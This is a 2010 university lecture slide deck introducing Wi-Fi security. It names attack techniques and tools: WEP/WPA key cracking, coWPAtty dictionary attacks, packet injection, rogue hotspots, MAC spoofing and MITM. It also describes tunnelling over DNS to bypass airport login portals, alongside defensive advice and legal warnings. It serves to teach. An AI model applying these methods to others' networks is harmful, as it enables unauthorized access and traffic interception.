Вы находитесь на странице: 1из 22

WI-FI SECURITY

A gentle introduction to Hacking Wi-Fi

Thursday, February 25, 2010

PRESENTED BY

Paul Gillingwater, CISSP, CISM


Adjunct Professor of Computer Science
Webster University Vienna
http://security-risk.blogspot.com
Working in IT Security 20+ years

Thursday, February 25, 2010

A BRIEF OVERVIEW
Wi-Fi has been around more than 12 years -originally, it lacked any form of security
Since 2001, Wireless Encryption Protocol (WEP) has
been successfully attacked -- in 2007, it takes no more
than 90,000 packets to break keys (due to weaknesses
in RC4) -- time to crack less than 1 minute
Since 2004, Wi-Fi Protected Access (WPA & WPA2)
were introduced to address WEPs failure -- but even
this is not quite enough for full security

Thursday, February 25, 2010

WI-FI HISTORY
Originally offered as IEEE 802.11 in 1997 -- security
limited due to export restrictions of certain
governments
Implements Wireless LAN access over 2.4 and 5 GHz
bands -- former with 3 channels (and shared with
Amateur Radio and Cordless Phones), latter with 19
Initial systems 1-2 Mbps, later increased to 11 Mbps
with 802.11b, then up to 802.11n with 54-600 Mbps
possible (since 2009)

Thursday, February 25, 2010

WIRELESS SIGNALS
Any wireless signal can be received by suitable
equipment
Key-sharing is fundamental issue -- and the more
often a key is used, the easier it is to find it due to
mathematics of encryption
In addition to receiving packets, we can also inject
packets -- e.g., ARP or de-auth to create traffic

Thursday, February 25, 2010

SECURING WI-FI
In my view, only reliable method for securing Wi-Fi is
to run a VPN on top (e.g., OpenVPN)
WEP and WPA are easily broken (WPA TKIP cracked
in less than 1 minute by Japanese researchers in 2009)
WPA is TKIP -- WPA2 is CCMP, which is better (AES)
WPA2 is probably secure enough for home usage -but there is still risk of impersonation

Thursday, February 25, 2010

TRAFFIC MONITORING
On OSX, from command line (with sudo):
/System/Library/PrivateFrameworks/
Apple80211.framework/Versions/A/
Resources/airport
Specify en1 sniff 1 as parameters to capture
packets into /tmp/airportSniffxxxx.cap file
WireShark is free utility for Windows, OSX or Linux
that captures and displays packets

Thursday, February 25, 2010

HOW WPA WORKS


WPA tried to fix WEP problems, while WPA2 was a
new approach to solving security problem
802.1X port access control is key to successful use
This Enterprise approach depends on separate
RADIUS authentication server -- each new session
gets a fresh key, good for a short time
Home networks dont use RADIUS, so a Pre Shared
Key (PSK) is used

Thursday, February 25, 2010

WPA KEY HANDSHAKE

Thursday, February 25, 2010

COW PATTY ATTACK


Where 802.1X not available, PSK may be sniffed from
other authenticating stations
KisMac and coWPAtty use dictionary and other
attacks to guess the PSK from captured packets
Packet injection can force re-connects to capture
coWPAtty with Rainbow Tables (pre-calculated
hashes) can test >18,000 pass-phrases per second

Thursday, February 25, 2010

WPA CRACKER
Regular WPA-PSK cracking on business grade
hardware can take up to two weeks
WPA Cracker is a commercial service using cloudbased computing with 400 nodes, which can crack a
WPA key in 20 minutes for $34
This is based on 135 million word dictionary attack -therefore a strong password can defeat this class
Businesses now know the price of security

Thursday, February 25, 2010

BOGUS HOTSPOTS
Any computer can also be a Wireless Access Point
Windows 7 has new feature SoftAP -- which can be
used for Internet Connection Sharing (use Connectify
for example -- http://connectify.me/)
However, the bad guys can capture all of the
packets which pass through their system, even if they
connect to you with WEP or WPA
Bad guys can use similar names, e.g., Webster-Wi-Fi

Thursday, February 25, 2010

MAC SPOOFING

Some Access Points allow restriction based on the


MAC (Media Access Control) address
This is good basic security, but not reliable -- because
attackers can simply sniff for trusted address and
use that in their own systems
802.1x makes this more difficult for attackers

Thursday, February 25, 2010

SUPPRESSING SSID

Most Wi-Fi networks broadcast


their network name -- called the SSID
Security may be improved by disabling this feature
for a home or business network
However, experienced hackers will simply monitor
authorized connections to learn the SSID

Thursday, February 25, 2010

MAN IN THE MIDDLE

A MITM attack means intruder pretends to be


authorized gateway, but intercepts and can change
packets (this was used by Japanese team with TKIP)
Example: Video of Cain tool, with packet capture
and WEP cracking
cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv

Thursday, February 25, 2010

BYPASSING AIRPORT WI-FI


Frequent airport travelers know about airport Wi-Fi
Such systems intercept HTTP, redirect to a login page
before allowing access (e.g., Boingo Hotspot)
Most airport Wi-Fi allows DNS lookups -- some direct,
and some via DNS relay
If port 53 is allowed, then you can run OpenVPN using
UDP port 53 to your home system
If DNS relayed, then use DNS tunnel (Linux mostly)

Thursday, February 25, 2010

AIRPORT RISKS
Free Wi-Fi hotspots in an airport or cafe might
belong to a hacker, who is capturing traffic -including, potentially, user names & passwords
Hackers can also relay HTTPS -- so dont assume
your password is safe at a public Hot Spot
Most hotspots dont use WEP or WPA -- so most
traffic is not encrypted (unless SSH or SSL is used)

Thursday, February 25, 2010

WI-FI SECURITY ADVICE


Avoid WEP and WPA/TKIP, use WPA2 or WPA/AES
If using in a business, use 802.1X -- otherwise make
sure you have PSK length > 20 characters
Use MAC access control (restrict connecting devices
based on their internal address)
Use VPN for truly sensitive information

Thursday, February 25, 2010

COMMERCIAL RISKS
TJ Maxx is classic example of Wi-Fi vector: resulted in
loss of 45 million customer records (Credit Card details)
The weakness was the use of WEP to secure a LAN, which was
exploited by the hackers
This breach cost the company $12 million in direct costs, not
including the subsequent remedial work and loss of PCI
compliance
Average cost of a Data Breach rose to $200 per customer record in
2009, according to Ponemon Institute study -- average total cost
rose to $6.75m

Thursday, February 25, 2010

LEGAL ASPECTS
In many countries, hacking others Wi-Fi is illegal -therefore, do any tests using your OWN gear
See NCSL web site for summary of States laws
Unauthorized access can attract serious
prosecutions, fines and criminal charges
Within Webster University, unauthorized Wi-Fi
access could be grounds for expulsion

Thursday, February 25, 2010

LATEST WI-FI TRENDS


Passive-Aggressive SSIDs now used by some... e.g.:
YOURDOGPOOPSINMYYARD
TURNTHEMUSICDOWN
CAITLINSTOPUSINGOURINTERNET
WECANHEARYOUHAVINGSEX
OBAMAISASOCIALIST

Thursday, February 25, 2010

THANK YOU!

Any questions?
Comments?
Discussion....

Thursday, February 25, 2010